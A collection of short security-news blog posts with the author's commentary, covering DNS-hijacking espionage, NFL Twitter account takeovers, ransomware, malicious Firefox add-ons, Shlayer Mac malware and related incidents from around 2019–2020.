Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 are believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected by the operations, ranging from government ministries and agencies, private industry, and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting. If you are unfamiliar with the term, it is the act of tricking unsuspecting users to input their login credentials into a fraudulent web site or application. It usually starts off with a phishing email directing users to visit a web site which appears to be one the victim legitimately uses, asking them to login, and then storing the credentials for use in a later operation.

Once the attackers had amassed enough credential data, knowing average users often use the same password across multiple logins, the adversaries could then attempt to breach personal accounts - such as Twitter, Facebook, Gmail, and more - as well as their official government or business accounts. The latter being the crown jewels, although the personal accounts may also lead to additional opportunistic, targeted attacks.

What I find most alarming is certain DNS top-level domain providers were breached. The actual DNS servers themselves do not appear to have been affected but a number of organizations controlling them were compromised. Those organizations should know better, and have implemented better security controls, and security awareness.

This demonstrates how anyone can be the victim of a cyber attack.

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, to include the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

It is not like hacking Twitter accounts is all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams corporate networks, and other online presence. Why have they only thus far been successful with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using TFA there is a much greater chance this attack would not have been successful. I specifically called out the use of an authenticator app rather than SMS because the latter is vulnerable.

It will be interesting to see why only these five teams were selected out of the total thirty-two teams in the NFL today. I doubt it has anything to do with specific motivation to attack these teams, but more so because of lax security on those Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, claiming the average cost of a cyber attack to a Singapore-based business is approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.

And:

Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies they interviewed, arrived at these numbers. Internal incident response is a bit of an art to accurately quantify. Leveraging external resources to assist with breach remediation is much easier to understand.

The likelihood of all of these Singapore-based companies only using outside assistance is small. There is a stronger chance of a more hybrid approach, where internal responders work in conjunction with external help of some sort.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect from the internet due to a cyber attack. Although specifics about how the attack was executed are light, the city claims the attack occurred because of a vulnerable third-party provider:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details, and almost sounds word-smithed enough to purposely obfuscate any potential blame. A German journalist believes the attackers may have exploited vulnerable public facing Citrix servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-1978 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

It true, this is not at all related to a "weak point in the system of an external provider" but instead a failure of the city IT department to mitigate CVE-2019-1978. Failure to act in cyber space will almost always lead to a compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking the verdict on file samples and URL's. Although the service offers a variety of benefits, it should never be the sole trusted resource for conducting analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their “analysis checklist”. They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email as in whats the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for determining authenticity of files and URL's, but is not a one-stop shop to be unequivocally trusted. Any incident response playbook leveraging free applications like VT should contain multiple tools, whether on-site or cloud-based, for analysis.

The same can be said for Hybrid-Analysis. It is a wonderful tool, most often extremely capable of determining whether or not a sample is malicious. It is not infallible, and therefore because it is a free service should be used in conjunction with other free services. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate actions.

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily no sensitive files were compromised in the attack. However, one has to wonder how a government contractor has allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Maybe the bar is set so low that a simple ransomware attack is capable of being executed?

While no company can 100% ensure they are safe from attack, there is no reason why a standard ransomware attack should be successful. There are a myriad of endpoint security controls - from next-generation antivirus to endpoint detection & response - capable of either preventing or providing visibility on attacks like ransomware.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find vulnerable targets. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years they have done a lot of valuable work to ensure the web is a safe place to browse. In their latest move, Mozilla has taken a look at the Firefox add-on database and removed nearly two-hundred extensions for including malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is this single, relatively unknown company developing that many add-ons? It sure feels like a huge red flag. Surely there is some deception at play.

Laughably Unsophisticated Mac Malware

Major malware infections on macOS are quite rare but the operating system is, by no means, immune to what Windows users have had to endure for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises to provide the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infected method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Unless you have good self control, good web browsing hygiene, and common sense, stay away from web sites offering pirated content. Is that one free pirated movie worth all the work to rebuild your computer after it gets infected with some malware it should never have in the first place?

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe of tech.co writes one of the worst clickbait heading I have seen recently, stating cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article states a much different claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 conducted research through a survey of over 2,700 experts across 100 countries. These experts were stipulating impact to specific businesses as opposed to the overall global risk as the clickbait headline suggests.

Overall it is not a bad article, but headline hyperbole is strong with this one.

How Jeff Bezos’ iPhone X Was Hacked by Saudi Arabia

Jeff Bezos owns not just Amazon, but also the Washington Post, a newspaper highly critical of both President Donald Trump and Mohammad Bin Salman Al Saud. This in-depth New York Times articles details a likely scenario how Jeff Bezos had his iPhone X hacked purportedly by Saudi Arabia.